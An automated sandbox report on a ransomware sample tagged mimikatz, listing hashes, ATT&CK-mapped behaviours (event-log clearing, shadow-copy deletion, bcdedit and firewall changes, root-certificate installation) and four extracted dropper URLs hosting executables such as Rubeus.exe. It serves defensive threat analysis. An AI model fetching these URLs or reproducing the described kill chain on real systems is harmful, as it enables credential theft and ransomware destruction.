mimikatz | c690a152cb4f33da1c1d408089460cbccdf3dff520f2a93d403f15af6df6cc8f

Analysis

max time kernel
146s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
16/05/2024, 07:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
Size

5.2MB
MD5

7b94d09d7a163ea69ac507a86c1c69e8
SHA1

1fef4329b5a9ca9a037e9b1f7715f020dc955f40
SHA256

c690a152cb4f33da1c1d408089460cbccdf3dff520f2a93d403f15af6df6cc8f
SHA512

1027b042f70ef0dcff83af0a07ce4e72b835ba62d2ae9d3a6d6578ba306689017e1b4065b160ed295273e8311cb5ade4789db8deaec1da65c3b832a3c8debedb
SSDEEP

49152:MFtkoue3u4BfCwyls7ZRqTHquk3OcIA5EuLg0UC0GSJVnS7dErDb:M3jH+40wjqTHqJEQbgVSCDb

Score

10^/10

mimikatz defense_evasion evasion execution impact ransomware

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/anebgqa/d/releases/download/d/mz.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/anebgqa/c/releases/download/c/ps.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/anebgqa/e/releases/download/e/kln.exe

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal

T1070

pid	Process
4768	wevtutil.exe
2428	wevtutil.exe
1704	wevtutil.exe
4020	wevtutil.exe
4040	wevtutil.exe
4476	wevtutil.exe
3396	wevtutil.exe
1332	wevtutil.exe
3232	wevtutil.exe
2428	wevtutil.exe
1236	wevtutil.exe
3500	wevtutil.exe
4404	wevtutil.exe
2388	wevtutil.exe
4688	wevtutil.exe
3156	wevtutil.exe
3472	wevtutil.exe
4880	wevtutil.exe
1068	wevtutil.exe
3704	wevtutil.exe
2268	wevtutil.exe
4476	wevtutil.exe
4404	wevtutil.exe
4320	wevtutil.exe
2100	wevtutil.exe
512	wevtutil.exe
1860	wevtutil.exe
3104	wevtutil.exe
4536	wevtutil.exe
2156	wevtutil.exe
884	wevtutil.exe
1192	wevtutil.exe
2600	wevtutil.exe
952	wevtutil.exe
1068	wevtutil.exe
3732	wevtutil.exe
840	wevtutil.exe
752	wevtutil.exe
2820	wevtutil.exe
4112	wevtutil.exe
4160	wevtutil.exe
3236	wevtutil.exe
884	wevtutil.exe
3160	wevtutil.exe
296	wevtutil.exe
1192	wevtutil.exe
1400	wevtutil.exe
412	wevtutil.exe
764	wevtutil.exe
1708	wevtutil.exe
4320	wevtutil.exe
3008	wevtutil.exe
1620	wevtutil.exe
512	wevtutil.exe
2216	wevtutil.exe
3396	wevtutil.exe
4308	wevtutil.exe
3180	wevtutil.exe
4404	wevtutil.exe
4448	wevtutil.exe
680	wevtutil.exe
1620	wevtutil.exe
2940	wevtutil.exe
2216	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

resource	yara_rule
behavioral2/files/0x000a0000000232f7-289.dat	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
520	bcdedit.exe

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral2/files/0x000a0000000232f7-289.dat	mimikatz

Blocklisted process makes network request 8 IoCs

flow	pid	Process
52	1216	powershell.exe
54	1216	powershell.exe
57	1332	powershell.exe
58	1332	powershell.exe
59	1480	powershell.exe
61	1480	powershell.exe
68	1048	powershell.exe
69	1048	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3300	netsh.exe

Executes dropped EXE 4 IoCs

pid	Process
4768	mz.exe
756	ps.exe
1192	ps.exe
4904	kln.exe

Drops desktop.ini file(s) 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\Desktop\desktop.ini	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
File created	C:\Users\Admin\Documents\desktop.ini	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
File created	C:\Users\Admin\Downloads\desktop.ini	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
File created	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
File created	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
File created	C:\Users\Admin\Pictures\desktop.ini	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
60	raw.githubusercontent.com
61	raw.githubusercontent.com

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1216	powershell.exe

Discovers systems in the same network 1 TTPs 3 IoCs

discovery

Remote System Discovery

T1018

pid	Process
3892	net.exe
1028	net.exe
3496	net.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3484	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1596	taskkill.exe
3232	taskkill.exe
972	taskkill.exe
2260	taskkill.exe
2376	taskkill.exe
3396	taskkill.exe
3052	taskkill.exe
4404	taskkill.exe
4476	taskkill.exe
4776	taskkill.exe
1716	taskkill.exe
3532	taskkill.exe
2340	taskkill.exe
3168	taskkill.exe
3396	taskkill.exe
5088	taskkill.exe
3432	taskkill.exe
4848	taskkill.exe
3472	taskkill.exe
4784	taskkill.exe
1192	taskkill.exe
4880	taskkill.exe
2864	taskkill.exe
4768	taskkill.exe
4636	taskkill.exe
276	taskkill.exe
284	taskkill.exe
392	taskkill.exe
3716	taskkill.exe
752	taskkill.exe
3500	taskkill.exe
960	taskkill.exe
1140	taskkill.exe
3148	taskkill.exe
3484	taskkill.exe
1584	taskkill.exe
1892	taskkill.exe
3056	taskkill.exe
2080	taskkill.exe
384	taskkill.exe
4024	taskkill.exe
1068	taskkill.exe
1192	taskkill.exe
1792	taskkill.exe
4768	taskkill.exe
2708	taskkill.exe
516	taskkill.exe
3656	taskkill.exe
4904	taskkill.exe
1964	taskkill.exe
872	taskkill.exe
1196	taskkill.exe
292	taskkill.exe
1216	taskkill.exe
2228	taskkill.exe
3892	taskkill.exe
4300	taskkill.exe
412	taskkill.exe
3892	taskkill.exe
840	taskkill.exe
1860	taskkill.exe
2076	taskkill.exe
1196	taskkill.exe
3720	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1664	reg.exe
940	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	3576	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	680	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeBackupPrivilege	4440	vssvc.exe
Token: SeRestorePrivilege	4440	vssvc.exe
Token: SeAuditPrivilege	4440	vssvc.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	3180	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	3772	taskkill.exe
Token: SeDebugPrivilege	4784	taskkill.exe
Token: SeDebugPrivilege	960	taskkill.exe
Token: SeDebugPrivilege	2376	taskkill.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	2344	taskkill.exe
Token: SeDebugPrivilege	2740	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	1032	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	4860	taskkill.exe
Token: SeDebugPrivilege	284	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	3148	taskkill.exe
Token: SeDebugPrivilege	4956	taskkill.exe
Token: SeDebugPrivilege	3396	taskkill.exe
Token: SeDebugPrivilege	384	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	4652	taskkill.exe
Token: SeDebugPrivilege	1196	taskkill.exe
Token: SeDebugPrivilege	3532	taskkill.exe
Token: SeDebugPrivilege	392	taskkill.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	5088	taskkill.exe
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	3232	taskkill.exe
Token: SeDebugPrivilege	412	taskkill.exe
Token: SeDebugPrivilege	280	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	3472	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4276 wrote to memory of 1920	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	95
PID 4276 wrote to memory of 1920	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	95
PID 4276 wrote to memory of 1928	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	96
PID 4276 wrote to memory of 1928	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	96
PID 4276 wrote to memory of 4580	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	98
PID 4276 wrote to memory of 4580	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	98
PID 4276 wrote to memory of 1408	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	99
PID 4276 wrote to memory of 1408	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	99
PID 4276 wrote to memory of 3576	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	100
PID 4276 wrote to memory of 3576	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	100
PID 4276 wrote to memory of 3684	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	102
PID 4276 wrote to memory of 3684	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	102
PID 3684 wrote to memory of 1892	3684	powershell.exe	103
PID 3684 wrote to memory of 1892	3684	powershell.exe	103
PID 4276 wrote to memory of 4300	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	105
PID 4276 wrote to memory of 4300	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	105
PID 4276 wrote to memory of 3732	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	108
PID 4276 wrote to memory of 3732	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	108
PID 4276 wrote to memory of 744	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	109
PID 4276 wrote to memory of 744	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	109
PID 4276 wrote to memory of 1020	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	110
PID 4276 wrote to memory of 1020	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	110
PID 4276 wrote to memory of 1968	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	111
PID 4276 wrote to memory of 1968	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	111
PID 4276 wrote to memory of 680	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	113
PID 4276 wrote to memory of 680	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	113
PID 4276 wrote to memory of 2084	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	114
PID 4276 wrote to memory of 2084	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	114
PID 4276 wrote to memory of 3168	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	115
PID 4276 wrote to memory of 3168	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	115
PID 4276 wrote to memory of 3472	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	116
PID 4276 wrote to memory of 3472	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	116
PID 3472 wrote to memory of 3484	3472	powershell.exe	117
PID 3472 wrote to memory of 3484	3472	powershell.exe	117
PID 4276 wrote to memory of 4916	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	120
PID 4276 wrote to memory of 4916	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	120
PID 4916 wrote to memory of 3300	4916	powershell.exe	121
PID 4916 wrote to memory of 3300	4916	powershell.exe	121
PID 4276 wrote to memory of 1792	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	122
PID 4276 wrote to memory of 1792	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	122
PID 1792 wrote to memory of 1664	1792	powershell.exe	123
PID 1792 wrote to memory of 1664	1792	powershell.exe	123
PID 4276 wrote to memory of 3180	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	124
PID 4276 wrote to memory of 3180	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	124
PID 3180 wrote to memory of 940	3180	powershell.exe	125
PID 3180 wrote to memory of 940	3180	powershell.exe	125
PID 4276 wrote to memory of 4880	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	126
PID 4276 wrote to memory of 4880	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	126
PID 4880 wrote to memory of 520	4880	powershell.exe	127
PID 4880 wrote to memory of 520	4880	powershell.exe	127
PID 4276 wrote to memory of 1408	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	128
PID 4276 wrote to memory of 1408	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	128
PID 4276 wrote to memory of 3772	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	129
PID 4276 wrote to memory of 3772	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	129
PID 4276 wrote to memory of 4784	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	130
PID 4276 wrote to memory of 4784	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	130
PID 4276 wrote to memory of 960	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	132
PID 4276 wrote to memory of 960	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	132
PID 4276 wrote to memory of 2376	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	133
PID 4276 wrote to memory of 2376	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	133
PID 4276 wrote to memory of 3052	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	134
PID 4276 wrote to memory of 3052	4276	2024-05-16_7b94d09d7a163ea69ac507a86c1c69e8_snatch.exe	134
